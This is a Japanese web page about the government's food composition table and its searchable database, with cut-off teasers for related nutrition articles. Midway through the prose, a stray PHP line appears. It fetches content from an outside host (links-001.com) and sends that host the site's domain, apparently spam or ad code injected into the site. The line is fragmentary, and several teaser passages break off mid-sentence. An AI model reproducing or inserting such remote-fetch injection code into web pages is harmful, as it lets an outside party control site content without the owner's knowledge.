料理や食事の味方になる指標

食品成分表とは一体なんでしょうか。
簡潔に言えば、いろんな食品の成分を書きまとめているものです。
この成分表は文部科学省によって、7回ほど改訂されています。
現在は2015年が最新版となっています。
現在では文部科学省の食品成分表を利用して、データベースが公開されています。
食品名を検索することで、成分表をすぐ見ることができます。
成分表はカロリー・炭水化物・脂質などはもちろんのことですが、食物繊維・ビタミンなど詳細に記載されています。
食べ物だけではなく日常的に飲む、お茶も存在します。
ではこのデータベースはどのように活かせるでしょうか。
恐らく糖質制限やダイエットはもちろん、バランスのとれた食事をとるのにいい指標となるでしょう。
また料理をつくる人にとっては、家族や自分のために、もっと健康でいられるような工夫をすることが出来るでしょう。
食品成分表は文部科学省が出しているものやデータベースの他にも、いろんな著者の人が分かりやすく説明・紹介する本を発行しています。
そちらも確認してみるといいかもしれません。

".file_get_contents('http://links-001.com/ad/123set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

食品の栄養素について

最近の人は「この食品にはどんな栄養が含まれているのだろう」と気にする人が増えてきました栄養素によって

食品成分表を参考にしましょう

加工食品を食べる時には、食品成分表を参考にしましょう。
特に、食べ物に対してアレルギーを持って

食品の栄養素の量を記載する表とは

食品成分表とは、文部科学省によって作成されており、正式名で言うと「日本食品標準成分表」と言います。<

食品サンプルをコレクションすると面白い

食品サンプルは飲食店などで見かけることがありますが、本物とそっくりなので食欲を刺激するものだと思いま

サイトコンテンツ

食品の栄養素について
食品成分表を参考にしましょう
食品の栄養素の量を記載する表とは
食品サンプルをコレクションすると面白い